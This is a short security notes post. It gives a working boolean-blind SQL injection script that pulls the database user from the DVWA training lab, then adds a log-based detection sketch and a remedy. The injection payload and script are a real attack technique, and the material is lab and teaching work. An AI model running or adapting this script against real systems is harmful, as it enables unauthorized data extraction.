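For various reasons, sqlmap may fail to extract anything from an injection point. That is when writing your own script comes in handy. Below is a simple script that extracts the value of user(); adapt it as needed.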
```python
import requests

def GetQ():
    pd = ''  # prefix of user() recovered so far
    payload = '0123456789abcdefghijklmnopqrstuvwxyz!_@%'
    headers = {"Cookie": "security=low; PHPSESSID=65cba547699cda5ab206c6693735c8c6"}
    for i in range(30):
        for p in payload:
            # The condition is true (the page shows 'Surname') when user() starts with pd + p
            url = "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27%20and%20user()%20regexp%20%27^{}%27 and 'j'like'j&Submit=Submit#".format(pd+p)
            get = requests.get(url, headers=headers)
            # get.text is the decoded body (get.content is bytes on Python 3)
            if 'Surname' in get.text:
                # print(p)
                pd += p
                print(pd)

GetQ()
```
https://github.com/Jumbo-WJB/notes/blob/master/bool_sqli.py
Local test results
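From the defender's side, the script above leaves a distinctive trail in the web server access log: one client sends many requests whose `regexp '^...'` guess grows by one character at a time. The following detection sketch is an added example, not part of the original post; the log format, the IP addresses, the `min_probes` threshold and the sample value `app@` are all constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

PROBE = re.compile(r"regexp\s*'\^([^']*)'", re.IGNORECASE)  # regexp '^<guess>'
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')  # client IP, request target

def find_prefix_enumeration(log_lines, min_probes=10):
    """Return {ip: {"probes": n, "leaked_prefix": s}} for clients whose
    requests look like character-by-character REGEXP prefix guessing."""
    guesses = defaultdict(list)
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        probe = PROBE.search(unquote_plus(m.group(2)))
        if probe:
            guesses[m.group(1)].append(probe.group(1))
    findings = {}
    for ip, seen in guesses.items():
        longest = max(seen, key=len)
        # A guess of length n is only sent once its first n-1 characters were
        # confirmed, so the longest guess minus its last character is a lower
        # bound on what the client learned.
        if len(seen) >= min_probes and len(longest) > 1:
            findings[ip] = {"probes": len(seen), "leaked_prefix": longest[:-1]}
    return findings

def constructed_log(ip, secret, alphabet="abcdefghijklmnopqrstuvwxyz@"):
    """Constructed access-log lines (assumed combined-log style) that imitate
    the request pattern of the script for a made-up value of user()."""
    lines, known = [], ""
    for ch in secret:
        for guess in alphabet:
            target = ("/dvwa/vulnerabilities/sqli/?id=1%27%20and%20user()%20regexp"
                      "%20%27%5E{}%27&Submit=Submit".format(known + guess))
            lines.append('{} - - [01/Jan/2024:10:00:00 +0000] "GET {} HTTP/1.1" 200 4500'
                         .format(ip, target))
            if guess == ch:
                known += ch
                break
    return lines

# Constructed sample: one probing client plus one ordinary request.
SAMPLE_LOG = constructed_log("10.0.0.5", "app@") + [
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /dvwa/vulnerabilities/sqli/'
    '?id=2&Submit=Submit HTTP/1.1" 200 4400',
]

if __name__ == "__main__":
    print(find_prefix_enumeration(SAMPLE_LOG))
```

The `leaked_prefix` field gives incident responders a lower bound on what was disclosed; the fix for the injection itself is a parameterized query.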